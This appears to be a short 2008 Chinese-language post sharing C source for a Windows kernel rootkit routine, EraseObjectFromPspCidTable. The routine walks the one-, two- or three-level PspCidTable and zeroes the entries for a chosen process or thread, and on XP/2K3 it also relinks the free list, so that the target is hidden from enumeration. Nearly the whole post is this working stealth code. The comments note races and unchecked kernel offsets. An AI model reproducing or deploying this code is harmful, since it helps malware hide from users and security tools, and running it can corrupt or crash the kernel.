2008-10-13 16:10:57

详见fo,foto

下面贴出其中的一段代码：从 PspCidTable 句柄表中擦除目标对象条目的函数 EraseObjectFromPspCidTable。

////////////////////////////////////////////////////////////////////
// void EraseObjectFromPspCidTable
//
//      IN  DWORD   handle_table  address of the handle table (PspCidTable)
//                                that will be parsed and altered.
//      IN  PVOID   tarHandle     address of the object to hide (compared
//                                against the masked .object field of
//                                each entry).
//      IN  enum ObjectType obj_type  not used by this function; it only
//                                appeared in a bookkeeping call
//                                (add_index(&g_PspCidTableList, ...)) that
//                                is commented out in the original listing.
//      IN  DWORD   pid, tid      id of the process/thread being hidden;
//                                (tid != 0 ? tid : pid) is written into
//                                FirstFree on XP/2K3 (see below).
//
//      OUT none (return type void).  The erasure is done in place.
//
//  Description:  Walks the 1-, 2- or 3-level table and, for every entry
//                whose masked object pointer equals tarHandle, zeroes the
//                entry.  On XP/2K3 the slot is also threaded onto the
//                table's free list (entry.security = old FirstFree,
//                FirstFree = tid or pid).  On the other OS branch only
//                the entry is zeroed.  Matching entries are not
//                unique-checked: the loops never break after a hit, so
//                the whole table is scanned.
//
//      Note:     No lock is taken on the handle table before it is
//                modified.  A concurrent table update (handle creation /
//                teardown) races with this walk; on the XP/2K3 branch the
//                FirstFree write is a read-modify-write with no
//                synchronisation, so the free list itself can be
//                corrupted under contention.  This is kernel DKOM on
//                undocumented structures, driven by raw offsets
//                (HANDLECOUNTOFFSET, TABLEOFFSET) and the b_isXP2K3 flag
//                set elsewhere; nothing here validates that those
//                offsets match the running kernel.
void EraseObjectFromPspCidTable(DWORD handle_table, PVOID tarHandle, enum ObjectType obj_type, DWORD pid, DWORD tid)
{
 PTABLE_ENTRY   orig_tableEntry, p_tableEntry, *pp_tableEntry, **ppp_tableEntry;
 int a, b, c;
 int i_numHandles, i_hperPage, i_numTables;
 int i_handle; // never used in this function

 // Read but never used afterwards (dead store) - handle count at the
 // fixed offset inside the table header.
 i_numHandles = *(int*)(handle_table + HANDLECOUNTOFFSET);
 orig_tableEntry = (PTABLE_ENTRY)*(PDWORD)(handle_table + TABLEOFFSET);
 // The low two bits of the table pointer are decoded as the table level
 // (0 = one level, 1 = two levels, 2 = three levels); the 0xfffffff8 mask
 // below strips them to get the real array address.
 i_numTables = ((DWORD)orig_tableEntry & 3);
 
 
 if (b_isXP2K3 == TRUE)
 {
  // Entries per leaf page.  The same bound is reused for the pointer
  // arrays of the 2- and 3-level layouts, i.e. the code assumes a
  // pointer page holds as many slots as a leaf page - TODO confirm
  // against the target kernel's layout; if a pointer page holds more
  // entries than this, the upper part of the table is never scanned.
  i_hperPage = PAGE_SIZE/sizeof(TABLE_ENTRY); 
  
  if (i_numTables == 0)
  {
   // Single-level table: one flat array of entries.
   p_tableEntry = (PTABLE_ENTRY)((DWORD)orig_tableEntry & 0xfffffff8);
   for (a = 0; a < i_hperPage; a++)
   {
    // Set the high bit and clear the low three (flag) bits of the stored
    // object pointer before comparing with the kernel-mode address.
    if (((p_tableEntry[a].object | 0x80000000) & 0xfffffff8) == ((DWORD)tarHandle))
    {
     // Original listing also recorded (a, old object, old security) via
     // a commented-out add_index(&g_PspCidTableList, SINGLE_LEVEL, ...)
     // so the entry could be restored later.

     // Push the slot onto the free list: old head goes into .security,
     // the hidden id becomes the new head.  Order of these two stores
     // matters.
     p_tableEntry[a].object = 0;
     p_tableEntry[a].security = ((PHANDLE_TABLE)handle_table)->FirstFree;
     ((PHANDLE_TABLE)handle_table)->FirstFree = (ULONG)( (tid!=0) ? tid : pid );
    }
   }
  }
  else if (i_numTables == 1)
  {
   // Two-level table: array of pointers to leaf arrays.  A NULL pointer
   // is treated as the end of the pointer array.
   pp_tableEntry = (PPTABLE_ENTRY)((DWORD)orig_tableEntry & 0xfffffff8);
   
   for (a = 0; a < i_hperPage; a++)
   {
    if (pp_tableEntry[a] == NULL)
     break;

    for (b = 0; b < i_hperPage; b++)
    {
     if (((pp_tableEntry[a][b].object | 0x80000000) & 0xfffffff8) == ((DWORD)tarHandle))
     {
      // Same erase + free-list push as the single-level case
      // (bookkeeping add_index(..., DOUBLE_LEVEL, ...) commented out
      // in the original).
      pp_tableEntry[a][b].object = 0;
      pp_tableEntry[a][b].security = ((PHANDLE_TABLE)handle_table)->FirstFree;
         ((PHANDLE_TABLE)handle_table)->FirstFree = (ULONG)( (tid!=0) ? tid : pid );
     }
    }
    
   }
  }
  else if (i_numTables == 2)
  {
   // Three-level table: pointers to pointers to leaf arrays; NULL at
   // either pointer level ends that array.
   ppp_tableEntry = (PPPTABLE_ENTRY)((DWORD)orig_tableEntry & 0xfffffff8);
   for (a = 0; a < i_hperPage; a++)
   {
    if (ppp_tableEntry[a] == NULL)
     break;

    for (b = 0; b < i_hperPage; b++)
    {
     if (ppp_tableEntry[a][b] == NULL)
      break;

     for (c = 0; c < i_hperPage; c++)
     {
      if (((ppp_tableEntry[a][b][c].object | 0x80000000) & 0xfffffff8) == ((DWORD)tarHandle))
      {
       // Erase + free-list push (add_index(..., TRIPLE_LEVEL, ...)
       // commented out in the original).
       ppp_tableEntry[a][b][c].object = 0;
       ppp_tableEntry[a][b][c].security = ((PHANDLE_TABLE)handle_table)->FirstFree;
             ((PHANDLE_TABLE)handle_table)->FirstFree = (ULONG)( (tid!=0) ? tid : pid );
      }
     }
     
    }
   }
  }
 }
 else if (b_isXP2K3 == FALSE)
 {
  // Non-XP/2K3 branch: the level bits are ignored and the table is
  // always walked as three levels of 256 entries (hard-coded, not
  // derived from PAGE_SIZE).  The free list is NOT updated here - the
  // entry is simply zeroed, so FirstFree is left untouched.
  i_hperPage = 256;

  ppp_tableEntry = (PPPTABLE_ENTRY)((DWORD)orig_tableEntry & 0xfffffff8);
  for (a = 0; a < i_hperPage; a++)
  {
   if (ppp_tableEntry[a] == NULL)
    break;

   for (b = 0; b < i_hperPage; b++)
   {
    if (ppp_tableEntry[a][b] == NULL)
     break;

    for (c = 0; c < i_hperPage; c++)
    {

     if (((ppp_tableEntry[a][b][c].object | 0x80000000) & 0xfffffff8) == ((DWORD)tarHandle))
     {
      // Bookkeeping add_index(..., TRIPLE_LEVEL, ...) commented out in
      // the original; the entry is cleared without free-list linkage.
      ppp_tableEntry[a][b][c].object = 0;
      ppp_tableEntry[a][b][c].security = 0;
     }
    }
    
   }
  }
 }
}

